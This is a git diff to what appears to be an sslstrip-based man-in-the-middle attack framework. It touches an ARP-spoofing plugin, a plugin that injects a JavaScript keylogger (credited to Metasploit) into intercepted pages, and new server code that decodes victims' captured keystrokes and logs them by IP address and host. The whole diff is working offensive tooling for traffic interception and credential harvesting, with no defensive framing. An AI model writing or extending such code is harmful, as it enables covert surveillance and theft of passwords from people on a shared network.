diff --git a/plugins/ArpSpoof.py b/plugins/ArpSpoof.py index db61fa9..c082f03 100644 --- a/plugins/ArpSpoof.py +++ b/plugins/ArpSpoof.py @@ -33,7 +33,7 @@ class ArpSpoof(Plugin): if self.interface == None or self.routerip == None: sys.exit("[-] %s plugin requires --routerip and --interface" % self.name) - print "[*] ArpSpoof plugin online" + print "[*] %s plugin online" % name if self.setup == True: print '[*] Setting up ip_forward and iptables' file = open('/proc/sys/net/ipv4/ip_forward', 'w') diff --git a/plugins/jskeylogger.py b/plugins/jskeylogger.py index db04c5c..ab8f3c6 100644 --- a/plugins/jskeylogger.py +++ b/plugins/jskeylogger.py @@ -9,14 +9,15 @@ class jskeylogger(Inject, Plugin): def initialize(self,options): Inject.initialize(self, options) - self.html_payload = self.get_payload() + self.html_payload = self.msf_keylogger() print "[*] %s online" % self.name - def get_payload(self): - #simple js keylogger stolen from http://wiremask.eu/xss-keylogger/ + def msf_keylogger(self): + #Stolen from the Metasploit module http_javascript_keylogger payload = """""" return payload \ No newline at end of file diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index 0aa54c5..b4bad00 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -80,7 +80,24 @@ class ServerConnection(HTTPClient): logging.warning(str(self.client.getClientIP()) + " Browser Profilerer data:\n" + out) elif 'keylog' in self.uri: - logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + self.postData) + keys = self.postData.split(",") + del keys[0]; del(keys[len(keys)-1]) + + nice = '' + for n in keys: + if n == '9': + nice += "" + elif n == '8': + nice = nice.replace(nice[-1:], "") + elif n == '13': + nice = '' + else: + try: + nice += n.decode('hex') + except: + print "ERROR: unknown char " + n + + logging.warning(str(self.client.getClientIP()) + " ["+ self.headers['host'] + "] " "Keys: " + nice) else: logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))